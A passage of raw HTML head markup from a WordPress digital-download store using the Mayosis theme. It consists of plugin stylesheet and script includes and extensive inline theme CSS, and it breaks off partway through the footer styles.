href='https://www.stockelementsfx.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://www.stockelementsfx.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.6.1' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://www.stockelementsfx.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.6.1' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='wpdigipro-coupons-front-css-css' href='https://www.stockelementsfx.com/wp-content/plugins/wpdigipro-coupons/assets/css/wpdigipro-coupons-front.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='malihu-custom-scrollbar-css-css' href='https://www.stockelementsfx.com/wp-content/plugins/custom-scrollbar//asset/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='edd_all_access_css-css' href='https://www.stockelementsfx.com/wp-content/plugins/edd-all-access/assets/css/styles.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='mayosis-style-css' href='https://www.stockelementsfx.com/wp-content/themes/mayosis/style.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='mayosis-essential-css' href='https://www.stockelementsfx.com/wp-content/themes/mayosis/css/essential.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='mayosis-main-style-css' href='https://www.stockelementsfx.com/wp-content/themes/mayosis/css/main.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='fontawesome-five-css' href='https://www.stockelementsfx.com/wp-content/themes/mayosis/css/fontawesome-all.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='fontaweome-four-css' href='https://www.stockelementsfx.com/wp-content/themes/mayosis/css/font-awesome-4.7.0.min.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='poppins-css' href='https://fonts.googleapis.com/css?family=Poppins%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic&#038;ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-css' href='https://www.stockelementsfx.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=4.2.0' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://www.stockelementsfx.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5.4' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-animations-css' href='https://www.stockelementsfx.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=2.4.7' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://www.stockelementsfx.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=2.4.7' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-pro-css' href='https://www.stockelementsfx.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=2.1.4' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-global-css' href='https://www.stockelementsfx.com/wp-content/uploads/elementor/css/global.css?ver=1555495593' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-417-css' href='https://www.stockelementsfx.com/wp-content/uploads/elementor/css/post-417.css?ver=1551601560' type='text/css' media='all' /> <link rel='stylesheet' id='edd-infinite-scroll-animate-css-css' href='https://www.stockelementsfx.com/wp-content/plugins/edd-infinite-scrolling/assets/css/animate.min.css?ver=1.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='edd-infinite-scroll-css-css' href='https://www.stockelementsfx.com/wp-content/plugins/edd-infinite-scrolling/assets/css/edd-infinite-scroll.min.css?ver=1.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='edd-wl-styles-css' href='https://www.stockelementsfx.com/wp-content/plugins/edd-wish-lists-master/templates/edd-wl.min.css?ver=1.1.6' type='text/css' media='screen' /> <link rel='stylesheet' id='lumise-style-css' href='https://www.stockelementsfx.com/wp-content/plugins/lumise/woo/assets/css/frontend.css?ver=1.7.5' type='text/css' media='all' /> <link rel='stylesheet' id='wpdigipro-front-dashboard-css-css' href='https://www.stockelementsfx.com/wp-content/plugins/wpdigipro/assets/css/front/wpdigipro-front-dashboard.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='wpdigipro-icons-css-css' href='https://www.stockelementsfx.com/wp-content/plugins/wpdigipro/assets/css/wpdigipro-icons.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='kirki-styles-global-css' href='https://www.stockelementsfx.com/wp-content/plugins/mayosis-core/kirki/assets/css/kirki-styles.css?ver=4.9.8' type='text/css' media='all' /> <style id='kirki-styles-global-inline-css' type='text/css'> body,table tbody tr td,table thead tr th, table tfoot tr td{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:16px;font-weight:400;line-height:30px;}h2.page_title_single{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:36px;font-weight:900;letter-spacing:-0.75px;line-height:45px;}h1.single-post-title{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:36px;font-weight:900;line-height:45px;}h1{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:36px;font-weight:900;letter-spacing:-0.75px;line-height:45px;}h2{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:30px;font-weight:900;letter-spacing:-0.5px;line-height:42px;}h3{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:24px;font-weight:900;line-height:36px;}h4{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:19px;font-weight:900;line-height:30px;}h5{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:16px;font-weight:900;line-height:24px;}h6{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:14px;font-weight:900;letter-spacing:0.5px;line-height:24px;}#mayosis-menu > ul > li > a,.main-header ul li.cart-style-one a.cart-button,.search-dropdown-main a,.menu-item a,.cart-style-two .cart-button{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:16px;font-weight:400;}#mayosis-menu ul ul{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:16px;font-weight:400;line-height:30px;}#top-main-menu > ul > li > a ,.top-header #cart-menu li a{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:14px;font-weight:400;line-height:14px;}#top-main-menu ul ul a{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:14px;font-weight:400;line-height:20px;}#sidebar-wrapper .navbar-nav > li > a, #sidebar-wrapper #mega-menu-wrap-main-menu #mega-menu-main-menu > li.mega-menu-item > a.mega-menu-link{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:14px;font-weight:400;line-height:20px;}#sidebar-wrapper .dropdown-menu > li > a{font-family:Poppins, Helvetica, Arial, sans-serif;font-size:14px;font-weight:400;line-height:20px;} </style> <link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPoppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&#038;ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='ws-plugin--s2member-css' href='https://www.stockelementsfx.com/wp-content/plugins/s2member/s2member-o.php?ws_plugin__s2member_css=1&#038;qcABC=1&#038;ver=170722-170722-2623888357' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://www.stockelementsfx.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/www.stockelementsfx.com","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpdigipro_coupons_ajax_url = {"ajaxUrl":"https:\/\/www.stockelementsfx.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/wpdigipro-coupons/assets/js/wpdigipro-coupons.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=5.5.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpdigiproFrontEndJS = {"ajaxUrl":"https:\/\/www.stockelementsfx.com\/wp-admin\/admin-ajax.php","status":"","varify_email_message":"Verifying Email ID...","varify_email":"","is_user_logged_in":"","fb_track_onclick":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/wpdigipro/assets/js/front/wpdigipro-front.js?ver=4.9.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpdigiproFrontJS = {"ajaxUrl":"https:\/\/www.stockelementsfx.com\/wp-admin\/admin-ajax.php","status":"","varify_email_message":"Verifying Email ID...","varify_email":"","is_user_logged_in":"","fb_track_onclick":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/wpdigipro/assets/js/front/wpdigipro-front-login.js?ver=4.9.8'></script> <link rel='https://api.w.org/' href='https://www.stockelementsfx.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.stockelementsfx.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.stockelementsfx.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.8" /> <meta name="generator" content="WooCommerce 3.6.1" /> <link rel="canonical" href="https://www.stockelementsfx.com/" /> <link rel='shortlink' href='https://www.stockelementsfx.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.stockelementsfx.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.stockelementsfx.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.stockelementsfx.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.stockelementsfx.com%2F&#038;format=xml" /> <style type='text/css'> .ae_data .elementor-editor-element-setting { display:none !important; } </style><meta name="generator" content="Easy Digital Downloads v2.9.8" /> <meta name="generator" content="EDD CFM v2.1.4" /> <!--[if IE]> <link rel='stylesheet' type='text/css' href='https://www.stockelementsfx.com/wp-content/plugins/use-your-drive/css/skin-ie.css' /> <![endif]--> <!--[if IE 8]> <style>#UseyourDrive .uyd-grid .entry_thumbnail img{margin:0!important}</style> <![endif]--> <script type="text/javascript"> var ajaxurl = 'https://www.stockelementsfx.com/wp-admin/admin-ajax.php'; </script> <style> /**Common Style**/ body { color:#28375a; background:#ffffff; } .fes-form.fes-submission-form-div,.fes_dashboard_menu,.fes-fields table,#fes-vendor-dashboard table,#fes-product-list tbody tr td,.fes-profile-form{ background:#ffffff !important; border-color:#ffffff !important; } .sidebar-theme ul li a,.bottom-widget-product a,.total-post-count p,.author_single_dm_box p, .author_single_dm_box a,.author_meta_single h2 a,.author_meta_single p,.author_meta_single a, .author_meta_single ul li a,.comment-content p,a.sigining-up,.edd-lost-password a,.edd-login-remember span,.promo_price,#edd_checkout_cart th,#edd_checkout_form_wrap legend,#edd_checkout_wrap #edd_checkout_form_wrap label, #edd_checkout_form_wrap span.edd-description,span.edd_checkout_cart_item_title,#edd_checkout_cart .edd_cart_header_row th,#edd_checkout_cart td,#edd_checkout_form_wrap input.edd-input, #edd_checkout_form_wrap textarea.edd-input, #edd_checkout_form_wrap span.edd-required-indicator,#edd_checkout_form_wrap select.edd-select,.single-user-info ul li a,.stylish-input-group button,.user-info span,.user-info a,.single_author_post,.empty_cart_icon i, .empty_cart_icon h2,.fourzerofour-area h1,.fourzerofour-area h3,#edd_profile_editor_form label,table tbody tr td,.mayosis-madalin .modal-header .close,.product-price h3,.sidebar-details p,.bottom-product-sidebar h4, .sidebar-blog-categories ul li a,.release-info .rel-info-value,.release-info .rel-info-tag,#edd_login_form .edd-input, #edd_register_form .edd-input,.grid-testimonal-promo .testimonial_details i.testimonial_queto_dm,.bottom_meta a, .dm_comment_author,.dm_comment-date,.comment--dot,.single-blog-title a,.single-blog-title,.top-header .top-social-icon li a:hover,code,.search-dropdown-main button,.post-promo-box.grid_dm .overlay_content_center a,a.edd-wl-action.edd-wl-button span, .photo--price--block a.edd-wl-action.edd-wl-button{ color:#28375a } h1,h2,h3,h4,h5,h6,a,.mayosis-play--button-video:focus,.mayosis-play--button-video{ color:#28375a } .section-title,.product-meta a:hover,.maxcollapse-open .maxcollapse-input,.maxcollapse-open .maxcollapse-input::placeholder,.maxcollapse-open .maxcollapse-icon,#edd_show_discount,#edd_final_total_wrap,.bottom-product-sidebar h4,.sidebar-details h3 a,.bottom-product-sidebar .sidebar-details p,.bottom-widget-product .product-price .edd_price,.sidebar-details h3,.sidebar-details h3 a,.sidebar-details p,.sidebar-blog-categories ul li a,.edd_price_options.edd_single_mode ul li label,.product-price h3,.single-user-info ul li a,.single-blog-title a,.single-blog-title,.user-info a,legend, pre{ color:#28375a !important; } ::-webkit-input-placeholder,::-moz-placeholder,#edd_checkout_form_wrap input.edd-input::placeholder,#edd_checkout_form_wrap textarea.edd-input::placeholder,#edd_login_form .edd-input::placeholder, #edd_register_form .edd-input::placeholder,sidebar-search input[type=search]::placeholder{ color:#28375a !important; } .tag_widget_single ul li a,.sidebar-blog-categories ul li{ border-color:rgba(40,55,90,0.25) !important; color:#28375a; } .ghost_button{ border-color:#28375a; } .ghost_button:hover,.tag_widget_single ul li a:hover{ background:#28375a; } .mayosis-title-audio .mejs-button>button{ background-color:#28375a; } ::-moz-selection{ background-color:#28375a !important; } ::selection{ background-color:#28375a !important; } #menu-toggle,.mobile_user > .navbar-nav > li > a{ color:#ffffff; border-color:#ffffff; } .burger span, .burger span::before, .burger span::after{ background-color:#ffffff; } table#edd_checkout_cart tbody,#edd_checkout_cart input.edd-item-quantity,.rel-info-value p{ border-color:#28375a; } .button_text{ background-color:#28375a; border-color:#28375a; color:#ffffff; } .button_ghost.button_text,.button_link.button_text,nav.fes-vendor-menu ul li.active a{ color:#28375a; } .button_ghost.button_text:hover{ background:#28375a !important; border-color:#28375a; color:#ffffff; } #fes-save-as-draft{ border-color:#28375a !important; color:#28375a !important; } .bottom-post-footer-widget,.post-view-style,.post-promo-box,.sidebar-theme,.author_meta_single,.single_author_post,.sidebar-product-widget,.single-blog-widget, blockquote,table#edd_purchase_receipt, table#edd_purchase_receipt_products,table,pre, table#edd_purchase_receipt, table#edd_purchase_receipt_products, .fes-fields textarea{ background:#e9edf7; } table#edd_purchase_receipt, table#edd_purchase_receipt_products,table,pre,code{ border-color:#e9edf7; } /** Primary color**/ #commentform input[type=submit],.slider_dm_v .carousel-indicators .active, #edd-purchase-button,.edd-submit,input.edd-submit[type="submit"], .dm_register_button,.back-to-top:hover,button.fes-cmt-submit-form,.mini_cart .cart_item.edd_checkout a,.photo-image-zoom{ background:#5a00f0 !important; border-color:#5a00f0 !important; color:#ffffff !important; } .button-sub-right .btn, .wpcf7-submit,.status-publish.sticky:before, .footer-link-page-post .footer-page-post-link,.lSSlideOuter .lSPager.lSpg > li:hover a, .lSSlideOuter .lSPager.lSpg > li.active a,.lSSlideOuter .lSPager.lSpg > li a { background:#5a00f0 !important; color:#ffffff !important; } p a,.post-viewas> .nav-pills>li.active>a, .post-viewas>.nav-pills>li.active>a:focus, .post-viewas>.nav-pills>li.active>a:hover,.fourzerofour-info a,a:hover, .sidebar-blog-categories ul li:hover, .sidebar-blog-categories ul li:hover a,.dm_comment_author a, .single-user-info ul li:first-child a:hover,.mayosis-popup .close:hover,.edd_price_options.edd_single_mode ul li label input:checked~span.edd_price_option_name:before{ color:#5a00f0; } .user-info a:hover,.product-title a:hover,.sidebar-blog-categories ul li:hover,.post-promo-box .single-blog-title a:hover,.edd_download_purchase_form .edd_price_options li.item-selected label{ color:#5a00f0 !important; } .carousel-indicators li,blockquote{ border-color:#5a00f0 !important; } #today a,#edd_payment_mode_select_wrap input[type="radio"]:checked::before,.edd_cart_footer_row .edd_cart_total,#edd_checkout_form_wrap input[type=radio]:checked::before{ color:#5a00f0 !important; } #wp-calendar caption,.edd_discount_link, #edd-login-account-wrap a, #edd-new-account-wrap a { color: #5a00f0 !important; border-color: #5a00f0 !important; } .edd-submit.button.blue, .single-cart-button a.btn, .edd_purchase_submit_wrapper a.edd-add-to-cart.edd-has-js, .single-news-letter .nl__item--submit:hover{ background:#5a00f0 !important; border-color:#5a00f0 !important; color:#ffffff !important; } .edd-submit.button.blue:hover, .single-cart-button a:hover.btn, .edd_purchase_submit_wrapper a.edd-add-to-cart.edd-has-js:hover,#commentform input[type=submit]:hover,#sidebar-wrapper a#menu-close,#sidebar-wrapper a#menu-close:hover,.mini_cart .main_widget_checout,#basic-user-avatar-form input[type="submit"],#edd_profile_editor_submit,#basic-user-avatar-form input[type="submit"]:hover,#edd_profile_editor_submit:hover,.styleone.btn,.single-product-buttons .multiple_button_v{ background-color:#5a00f0 !important; border-color:#5a00f0 !important; color:#ffffff !important; } .main-post-promo .single-user-info ul li a:hover,.post-viewas> .nav-pills>li.active>a,.post-viewas> .nav-pills>li>a:hover{ color:#5a00f0 !important; } .button_accent{ background-color:#5a00f0; border-color:#5a00f0; color:#ffffff; } .button_ghost.button_accent,.button_link.button_accent{ color:#5a00f0; } .button_ghost.button_accent:hover,.block-hover:hover{ background:#ffffff !important; border-color:#ffffff !important; color:#5a00f0 !important; } /** Secondary color**/ .single_author_box, .page_breadcrumb, #searchoverlay ,.overlay,#mayosis-sidebar .mayosis-sidebar-header,h2#sitemap_pages,.mobile--nav-menu,.grid--download--categories a.cat--grid--main::after,.jssortside,#mayosisone_1,#mayosis_side{ background:#1e0050; } .sidebar-search #icon-addon,.edd-fd-button,#edd_checkout_cart a.edd-cart-saving-button.edd-submit.button.blue,#edd_checkout_cart .edd-submit.button.blue,.mayosis-collapse-btn,#menu-toggle:hover,a.mobile-cart-button:hover,a.mobile-login-button:hover,#sidebar-wrapper,.modal-backdrop,.mayosis-main-media .mejs-controls,.mayosis-main-media .mejs-container{ border-color:#1e0050 !important; background:#1e0050 !important; } #edd_checkout_cart a.edd-cart-saving-button.edd-submit.button.blue:hover,.fourzerofour-info, #edd_profile_name_label, #edd_profile_billing_address_label, #edd_profile_password_label,#edd_user_history th, .styletwo.btn,.transbutton.btn:hover,.mayosisonet101,.social_share_widget a:hover,.social-button-bottom a:hover i, h2.reciept_heading,.fill .btn,#fes-comments-table tr.heading_tr,#fes-product-list thead,#edd_user_commissions_overview table tr th, #edd_user_commissions_paid thead tr th,#fes-order-list thead tr th, #edd_user_revoked_commissions_table thead tr th, #edd_user_unpaid_commissions_table thead tr th,.photo--template--button:hover{ border-color:#1e0050 !important; background:#1e0050 !important; color:#ffffff !important; } #searchoverlay .search input,#searchoverlay .search span,#searchoverlay .search input, #searchoverlay .search input::placeholder,#searchoverlay .close,.overlay{ border-color:#ffffff !important; color:#ffffff !important; } .transbutton.btn,.post-viewas> .nav-pills>li>a{ border-color:#1e0050 !important; color:#1e0050 !important; } h2.page_title_single,.sep,.page_breadcrumb .breadcrumb > .active,.page_breadcrumb .breadcrumb a,#menu-toggle:hover,a.mobile-cart-button:hover,a.mobile-login-button:hover,#sidebar-wrapper,.overlay_content_center a.overlay_cart_btn,.overlay_content_center a.overlay_cart_btn:hover,.widget-posts .overlay_content_center a i, .bottom-widget-product .overlay_content_center a i{ color:#ffffff !important; } .breadcrumb a,.breadcrumb > .active,.grid--download--categories a{ color:#ffffff; } .button_secaccent{ background-color:#1e0050; border-color:#1e0050; color:#ffffff; } .button_ghost.button_secaccent,.button_link.button_secaccent{ color:#1e0050; } .button_ghost.button_secaccent:hover{ background:#1e0050 !important; border-color:#1e0050; color:#ffffff; } /** Form Field color**/ p.comment-form-comment textarea,#edd_login_form .edd-input, #edd_register_form .edd-input,#edd_checkout_form_wrap input.edd-input, #edd_checkout_form_wrap textarea.edd-input,#edd_checkout_form_wrap select.edd-select, #edd_download_pagination a.page-numbers, #edd_download_pagination span.page-numbers,#edd_profile_editor_form input:not([type="submit"]),#edd_profile_editor_form select,#edd_user_history td,.dasboard-tab,#contact textarea, .wpcf7-form-control-wrap textarea,input[type="text"], input[type="email"], input[type="password"],.solid-input input, .common-paginav a.next, .common-paginav a.prev,#edd_download_pagination a.next,#edd_download_pagination a.prev,.fes-pagination a.page-numbers,.fes-pagination span.page-numbers, .fes-product-list-pagination-container a.page-numbers,.fes-product-list-pagination-container span.page-numbers,.fes-fields input[type=email],.fes-fields input[type=password] ,.fes-fields textarea,.fes-fields input[type=url],.fes-fields input[type=text],.fes-vendor-comment-respond-form textarea,.fes-fields select{ background:transparent; border:solid rgba(40,55,90,0.25); border-width:2px; } .common-paginav a.next:hover,.common-paginav a.prev:hover,.common-paginav a.page-numbers:hover, .common-paginav span.page-numbers:hover,.common-paginav span.page-numbers.current,#edd_download_pagination a.next:hover,#edd_download_pagination a.prev:hover,#edd_download_pagination span.page-numbers.current:hover,#edd_download_pagination span.page-numbers.current,#edd_download_pagination a.page-numbers:hover, #edd_download_pagination span.page-numbers:hover,.fes-pagination a.page-numbers:hover,.fes-pagination span.page-numbers:hover, .fes-product-list-pagination-container a.page-numbers:hover, .fes-product-list-pagination-container span.page-numbers:hover,.fes-pagination span.page-numbers.current,.fes-product-list-pagination-container span.page-numbers.current { border-color:#28375a; background:#28375a !important; } #fes-product-list tbody tr,#fes-order-list tbody tr, #edd_user_paid_commissions_table tbody tr, #edd_user_revoked_commissions_table tbody tr, #edd_user_unpaid_commissions_table tbody tr{ border-color:rgba(40,55,90,0.1); } .fes-ignore.button{ border:solid rgba(40,55,90,0.25); border-width:2px; color:#28375a; } .fes-ignore.button:hover{ background:#28375a; } p.comment-form-comment textarea:hover,#commentform input[type=text]:hover, #commentform input[type=email]:hover, p.comment-form-comment textarea:hover,#edd_login_form .edd-input:hover, #edd_register_form .edd-input:hover,#edd_checkout_form_wrap input.edd-input:hover, #edd_checkout_form_wrap textarea.edd-input:hover,#edd_checkout_form_wrap select.edd-select:hover,#edd_profile_editor_form input:not([type="submit"]):hover,#edd_profile_editor_form select:hover,#edd_user_history td:hover,.dasboard-tab,#contact textarea:hover, .wpcf7-form-control-wrap textarea:hover,input[type="text"]:hover, input[type="email"]:hover, input[type="password"]:hover,.solid-input input:hover,.product-search-form input[type="text"]:hover, .product-search-form input[type="search"]:hover{ border-bottom-color:#5a00f0 !important; } p.comment-form-comment textarea:focus,#commentform input[type=text]:focus, #commentform input[type=email]:focus, p.comment-form-comment textarea:focus,#edd_login_form .edd-input:focus, #edd_register_form .edd-input:focus,#edd_checkout_form_wrap input.edd-input:focus, #edd_checkout_form_wrap textarea.edd-input:focus,#edd_checkout_form_wrap select.edd-select:focus,#edd_profile_editor_form input:not([type="submit"]):focus,#edd_profile_editor_form select:focus,#edd_user_history td:focus,.dasboard-tab,#contact textarea:focus, .wpcf7-form-control-wrap textarea:focus,input[type="text"]:focus, input[type="email"]:focus, input[type="password"]:focus,.solid-input input:focus,.product-search-form input[type="text"]:focus, .product-search-form input[type="search"]:focus{ border-color:#5a00f0 !important; } .hover_effect_single,.hover_effect,figure.effect-dm2 figcaption{ background-color:rgba(11,14,14,0.8); color:#ffffff } figure.mayosis-fade-in figcaption{ background-color:rgba(11,14,14,0.8); color:#ffffff; } .button-fill-color{ background-color:#ffffff; color:rgba(11,14,14,0.8); } .download-count-hover,.product-hover-social-share .social-button a, .product-hover-social-share .social-button a i,.recent_image_block .overlay_content_center a{ color:#ffffff !important; } .button-fill-color:hover,.licence_main_title.youcantitle{ background:#5a00f0 !important; border-color:#5a00f0 !important; color:#ffffff !important } .main_content_licence.youcan table tr td .icon-background1 { color:#5a00f0 !important; } .overlay_content_center .live_demo_onh{ border-color:#ffffff; color:#ffffff; } .overlay_content_center .live_demo_onh:hover{ background-color:#ffffff; border-color:#ffffff; color:rgba(11,14,14,0.8) !important; } /**End Common Style**/ /**Header Style**/ .header-content-wrap,#mayosis-sidebar,#mobileheader{ background:#1e0050; } #top-main-menu > ul > li > a ,.top-header #cart-menu li a{ color:#222234; } .top-header .cart_widget .mini_cart{ background:#222234; } .top-header{ height:40px; line-height:40px; background: #ffffff; color:#222234; } #top-main-menu > ul > li > a ,.top-header #cart-menu li a { line-height:40px !important; } #top-main-menu ul ul a{ color:#ffffff; } #top-main-menu ul ul a, .top-header .cart_widget .mini_cart { background:#222234; } #top-main-menu ul ul:before,.top-header .cart_widget .mini_cart:before{ border-bottom: 10px solid #222234; } #top-main-menu ul ul:after, .top-header .cart_widget .mini_cart:after{ border-bottom: 9px solid #222234; } #top-main-menu > ul > li > a > i , .top-header #cart-menu li a i,#top-main-menu ul li a i,.top-cart-menu li a i, .top-cart-menu li i { font-size:12px; } /**Header Form **/ .fill .form-control,.stylish-input-group input,.search-field,.maxcollapse-open .maxcollapse-input,.photo--price--block a.edd-wl-action.edd-wl-button{ background-color:#e9edf7; border-color:#e9edf7; } header.sticky{ height:80px; } .header-content-wrap{ height:80px ; line-height:80px; padding-top:40px; padding-right:0px; padding-bottom:40px; padding-left:0px; } .main-header .maxcollapse,.maxcollapse-icon, .maxcollapse-submit{ height:80px; line-height:80px; } #mayosis-menu > ul > li > a{ line-height:80px; } header.fixedheader #mayosis-menu > ul > li > a,header.fixedheader .cart-button,header.fixedheader .search-dropdown-main a,.sticky #mayosis-menu > ul > li > a,.sticky .cart-button,.sticky .search-dropdown-main a,header.fixedheader .cart-style-two .cart-button,.sticky .cart-style-two .cart-button,header.fixedheader .searchoverlay-button,.sticky .searchoverlay-button,header.fixedheader #menu-toggle,header.fixedheader .mobile_user > .navbar-nav > li > a,.sticky .mobile_user > .navbar-nav > li > a{ color:#3c465a !important; } header.fixedheader #menu-toggle,header.fixedheader .mobile_user > .navbar-nav > li > a,.sticky .mobile_user > .navbar-nav > li > a{ border-color:#3c465a !important; } header.fixedheader .burger span, header.fixedheader .burger span::before, header.fixedheader .burger span::after{ background-color:#3c465a; } header.sticky { background-color:#ffffff !important; } header.fixedheader { background:#ffffff !important; } .headroom {position: fixed;left: 0;right: 0;z-index:9999;top:0;} .headroom--unpinned,#mobileheader.headroom--unpinned{ -moz-transform: translateY(-150%); -ms-transform: translateY(-150%); -webkit-transform: translateY(-150%); transform: translateY(-150%) } header.fixedheader{ top:0; } .admin-bar header.fixedheader,.admin-bar .headroom{ top:32px; } header.fixedheader .site-logo img.main-logo,header.fixedheader .center-logo img.main-logo,header.fixedheader#mobileheader .mobile-logo{ opacity:0; display:none !important; } .fixedheader.main-header .site-logo .sticky-logo,.fixedheader.main-header .center-logo .sticky-logo,#mobileheader.fixedheader .sticky-logo{ display:inline-block; opacity:1; } /**End Header Style**/ /**Menu Style**/ #mayosis-menu> ul > li > a:hover{ opacity:.5; } #mayosis-menu > ul > li > a,.main-header ul li.cart-style-one a.cart-button,.search-dropdown-main a,.menu-item a,.cart-style-two .cart-button { color:#ffffff; } #mayosis-menu ul ul{ color:#ffffff !important; } #mayosis-sidemenu > ul > li > a:hover, #mayosis-sidemenu > ul > li.active > a, #mayosis-sidemenu > ul > li.open > a{ color:#ffffff !important; } #mayosis-menu ul ul,.search-dropdown-main ul,.main-cart-bar .cart_widget .mini_cart,.center-right-menu .cart_widget .mini_cart,#mayosis-sidemenu > ul > li > a:hover, #mayosis-sidemenu > ul > li.active > a, #mayosis-sidemenu > ul > li.open > a{ background:#1e0046; } .search-dropdown-main ul:after,.main-cart-bar .cart_widget .mini_cart:after,.center-right-menu .cart_widget .mini_cart:after{ border-bottom: 9px solid #1e0046 !important; } #mayosis-menu ul ul:before{ border-bottom: 10px solid #1e0046 !important; } .searchoverlay-button{ color:#ffffff; } .cart-style-one .cart-button .edd-cart-quantity, .cart_top_1 > .navbar-nav > li > a.login-button,.main-header .login-button:hover,.sidemenu-login .login-button{ background:#5a00f0; border-color:#5a00f0; color:#ffffff; } .main-header .login-button{ background:rgba(255,255,255,.0); border-color:rgba(255,255,255,0.25); color:#ffffff; } header.fixedheader .login-button{ color:#3c465a; border-color:#3c465a; } .mayosis-option-menu li a i, .mayosis-option-menu li i, .desktop-hamburger-item i, #mayosis-menu ul li a i{ font-size:13px; } #sidebar-wrapper .navbar-nav > li > a, #sidebar-wrapper #mega-menu-wrap-main-menu #mega-menu-main-menu > li.mega-menu-item > a.mega-menu-link{ color:#ffffff !important; } #sidebar-wrapper .dropdown-menu > li > a { color:#ffffff !important; } #mayosis-menu ul li a i { display:none; } /**End Menu Style**/ /**Footer Style**/ .main-footer{ padding-top:60px; padding-right:0px; padding-bottom:60px; padding-left:0px; } footer.main-footer{ 